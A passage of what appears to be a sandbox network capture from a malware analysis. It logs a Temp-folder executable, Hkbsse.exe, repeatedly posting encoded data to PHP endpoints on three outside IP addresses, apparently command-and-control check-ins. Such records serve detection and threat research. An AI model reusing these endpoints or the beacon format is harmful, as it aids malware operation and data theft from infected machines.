Aug 27, 2024 14:19:49.279782057 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:49.523561001 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.6	52263	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:49.270199060 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.6	52264	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:49.647397995 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:50.321351051 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:50.322577000 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:50.557070971 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.6	52265	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:50.677529097 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:51.376151085 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:51.377126932 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.6	52266	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:51.132420063 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.6	52268	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:51.568866968 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.6	52269	89.23.103.42	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:51.568891048 CEST	314	OUT	POST /hb9IvshS02/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 89.23.103.42 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.6	52270	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:51.675678968 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:52.354130983 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:52.361597061 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:52.601002932 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.6	52271	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:52.724916935 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:53.416254997 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:53.419133902 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:53.665132999 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.6	52272	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:53.287843943 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.6	52273	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:53.798609972 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:54.543416023 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:54.544131994 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:54.830617905 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.6	52274	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:54.877856016 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.6	52275	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:54.941731930 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.6	52276	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:55.582681894 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:56.306447983 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.6	52277	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:55.691427946 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.6	52278	89.23.103.42	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:55.692907095 CEST	156	OUT	POST /hb9IvshS02/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 89.23.103.42 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.6	52279	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:56.547033072 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:57.305305004 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:57.305815935 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:57.592555046 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.6	52280	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:57.303368092 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.6	52281	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:57.707616091 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:58.421495914 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:58.422296047 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:58.703206062 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.6	52282	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:58.819415092 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:59.520168066 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
